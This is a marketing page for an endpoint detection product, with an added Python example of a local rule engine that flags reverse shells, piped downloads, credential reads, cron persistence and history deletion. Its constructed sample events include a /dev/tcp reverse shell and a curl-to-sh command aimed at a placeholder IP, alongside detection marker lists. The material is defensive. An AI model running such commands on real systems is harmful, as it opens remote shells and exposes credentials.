Endpoint Detection & Response
Visibility at Every Endpoint.
Lightweight agent with process monitoring, file integrity checks, behavioral baselines, and automated containment. Native on Linux and macOS.
Endpoint Visibility That Matters
Deep process and file system monitoring without the resource bloat
Process Monitoring
Real-time process creation and termination tracking with full parent-child relationship trees. Powered by the netlink process connector (CN_PROC) on Linux and the Endpoint Security framework on macOS. Note that CN_PROC delivers pids, not command lines, so argv must be read from /proc while the process is still alive.
File Integrity Monitoring
Watch critical directories for file creation, modification, and deletion. Uses inotify on Linux and FSEvents on macOS for kernel-sourced change events. Note that inotify watches are per directory and not recursive, so a watched tree needs one watch per subdirectory, bounded by fs.inotify.max_user_watches.
Behavioral Baselines
Learn normal process behavior per endpoint and detect deviations. UEBA-integrated baseline learning from process telemetry.
Allow & Deny Policies
Define process execution policies to block unauthorized software or enforce approved application lists across your fleet.
MITRE ATT&CK Rules
32 built-in detection rules mapped to MITRE ATT&CK techniques -- 25 process-based, 5 file integrity, and 2 EICAR test rules. Evaluated locally on the agent.
Fleet Management
Centralized agent registration via enrollment tokens, heartbeat monitoring, and configuration push from the SIEM management console.
How It Works
Lightweight agent architecture designed for minimal endpoint impact
Token-Based Enrollment
Agents register with the SIEM using enrollment tokens. No manual configuration per endpoint.
Heartbeat Monitoring
Periodic heartbeats report agent health, version, and status. An agent that misses its heartbeat window triggers an alert automatically.
TLS Transport
All telemetry is published to the SIEM over persistent TLS connections, so it is encrypted in transit between agent and SIEM.
Local Rule Evaluation
Detection rules run locally on the agent using the built-in DSL engine, so alerts fire without a round trip to the server.
What It Detects
Built-in rules cover common attack techniques out of the box
Reverse Shells
Detect common reverse shell patterns and suspicious shell spawning from web servers or services.
Privilege Escalation
Monitor for sudo abuse, SUID exploitation, and unexpected privilege changes.
Suspicious Downloads
Flag curl/wget to unusual destinations, encoded payloads, and script downloads from untrusted sources.
Config Tampering
Watch for modifications to critical system files, SSH configs, cron jobs, and startup scripts.
Credential Access
Detect access to password files, shadow databases, and credential stores.
Defense Evasion
Identify process name masquerading, log clearing, and history file manipulation.
Persistence
Monitor cron, systemd, launchd, and rc.local for unauthorized persistence mechanisms.
Discovery Activity
Flag local enumeration tools, network scanning from endpoints, and system reconnaissance commands.
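The following is an added illustration of what "local rule evaluation" over process and file telemetry looks like, not Void EDR's DSL, rule set, or agent code. It keeps a live process table from constructed exec/exit events so rules can walk parent chains, and runs one small rule for several of the categories above (reverse shells, suspicious downloads, credential access, persistence, defense evasion). The event field names, rule names, sample events and the MITRE technique mappings are the editor's assumptions for illustration.

```python
# Added example, not Void EDR code: a minimal local rule engine over constructed
# process and file events, one rule per category above. Field names, rule names,
# sample events and the MITRE technique mappings are the editor's assumptions.
import re
from collections import namedtuple

Alert = namedtuple("Alert", "rule technique pid detail")
WEB_SERVERS = {"nginx", "apache2", "httpd", "php-fpm", "gunicorn", "node"}
SHELLS = {"sh", "bash", "dash", "zsh"}
CRON_DIRS = ("/etc/cron.d/", "/etc/cron.daily/", "/etc/cron.hourly/", "/var/spool/cron/")
CRED_FILES = {"/etc/shadow", "/etc/gshadow", "/etc/master.passwd"}
CRED_TOOLS = {"passwd", "chpasswd", "sshd", "login", "su", "sudo"}  # expected shadow readers
HISTORY_FILES = (".bash_history", ".zsh_history", ".sh_history")
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "nc -e", "ncat -e")


def ancestors(procs, pid):
    """Comm names from pid upward through the live process table (the parent-child tree)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid]["comm"])
        pid = procs[pid]["ppid"]
    return chain


# Each rule takes (live process table, event) and returns an Alert or None.
def shell_from_web_server(procs, ev):
    if ev["type"] != "exec" or ev["comm"] not in SHELLS:
        return None
    chain = ancestors(procs, ev["ppid"])
    hit = next((c for c in chain if c in WEB_SERVERS), None)
    return hit and Alert("shell_from_web_server", "T1059.004", ev["pid"], f"{ev['comm']} under {hit}: {' <- '.join(chain)}")


def reverse_shell_pattern(procs, ev):
    if ev["type"] != "exec":
        return None
    cmd = " ".join(ev["argv"])
    hit = next((m for m in REVERSE_SHELL_MARKERS if m in cmd), None)
    return hit and Alert("reverse_shell_pattern", "T1059.004", ev["pid"], f"{hit!r} in {cmd!r}")


def download_piped_to_shell(procs, ev):
    if ev["type"] != "exec":
        return None
    cmd = " ".join(ev["argv"])
    if ("curl " in cmd or "wget " in cmd) and re.search(r"\|\s*(ba|da|z)?sh\b", cmd):
        return Alert("download_piped_to_shell", "T1105", ev["pid"], cmd)
    return None


def credential_file_access(procs, ev):
    if ev["type"] == "exec" and ev["comm"] not in CRED_TOOLS and CRED_FILES & set(ev["argv"][1:]):
        return Alert("credential_file_access", "T1003.008", ev["pid"], " ".join(ev["argv"]))
    return None


def cron_persistence(procs, ev):
    if ev["type"] == "file" and ev["op"] in ("create", "modify") and ev["path"].startswith(CRON_DIRS):
        writer = procs.get(ev["pid"], {}).get("comm", "?")  # who wrote it, from the live table
        return Alert("cron_persistence", "T1053.003", ev["pid"], f"{ev['op']} {ev['path']} by {writer}")
    return None


def history_tampering(procs, ev):
    if ev["type"] == "file" and ev["op"] in ("delete", "truncate") and ev["path"].endswith(HISTORY_FILES):
        return Alert("history_tampering", "T1070.003", ev["pid"], f"{ev['op']} {ev['path']}")
    return None


RULES = [shell_from_web_server, reverse_shell_pattern, download_piped_to_shell,
         credential_file_access, cron_persistence, history_tampering]


def evaluate(events, rules=RULES):
    """Feed events in arrival order: exec joins the live table before rules run, exit prunes it."""
    procs, alerts = {}, []
    for ev in events:
        if ev["type"] == "exit":
            procs.pop(ev["pid"], None)
            continue
        if ev["type"] == "exec":
            procs[ev["pid"]] = ev
        alerts.extend(a for a in (rule(procs, ev) for rule in rules) if a)
    return alerts


# Constructed telemetry, not a real capture; the final benign shell under sshd must not fire.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 100, "ppid": 1, "comm": "nginx", "argv": ["nginx", "-g", "daemon off;"]},
    {"type": "exec", "pid": 101, "ppid": 100, "comm": "php-fpm", "argv": ["php-fpm"]},
    {"type": "exec", "pid": 200, "ppid": 101, "comm": "sh", "argv": ["sh", "-c", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"]},
    {"type": "exec", "pid": 300, "ppid": 1, "comm": "sshd", "argv": ["sshd"]},
    {"type": "exec", "pid": 301, "ppid": 300, "comm": "bash", "argv": ["bash"]},
    {"type": "exec", "pid": 302, "ppid": 301, "comm": "bash", "argv": ["bash", "-c", "curl -s http://203.0.113.5/x.sh | sh"]},
    {"type": "exec", "pid": 303, "ppid": 301, "comm": "cat", "argv": ["cat", "/etc/shadow"]},
    {"type": "exec", "pid": 304, "ppid": 301, "comm": "tee", "argv": ["tee", "/etc/cron.d/update"]},
    {"type": "file", "pid": 304, "op": "create", "path": "/etc/cron.d/update"},
    {"type": "file", "pid": 301, "op": "delete", "path": "/home/dev/.bash_history"},
    {"type": "exit", "pid": 200},
    {"type": "exec", "pid": 400, "ppid": 301, "comm": "sh", "argv": ["sh", "-c", "ls"]},
]


def run_example():
    return evaluate(SAMPLE_EVENTS)
```

Running `run_example()` yields six alerts: two for the shell under php-fpm (parent-chain rule and the /dev/tcp marker), then the piped download, the shadow read, the cron drop attributed to `tee` via the live process table, and the history deletion; the benign `sh -c ls` under sshd produces nothing. The parent-chain rule is the one that depends on the agent's process tree being complete, which is why an EDR that loses exec events for short-lived parents will also lose this class of detection.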
Native SIEM Integration
EDR telemetry flows directly into Void SIEM for unified visibility
Automatic Correlation
Endpoint events correlate with network, cloud, and application data for complete attack chain visibility.
Process Tree Visualization
Full process trees rendered in the SIEM investigation view. Trace execution chains from initial access to impact.
Automated Response
SOAR playbooks can trigger endpoint containment actions based on detection rules and severity thresholds.
Lightweight by Design
Minimal Footprint
Single static binary. Low memory and CPU usage even under heavy process churn.
Single Binary
No runtime dependencies. Deploy via package manager, configuration management, or direct copy.
Hot Configuration
Policy and rule updates pushed from SIEM without restarting the agent.
Local Buffering
Events buffered locally if the SIEM connection drops. Delivered automatically when connectivity resumes.
Protect Every Endpoint
Request a demo or licensing details for Void EDR.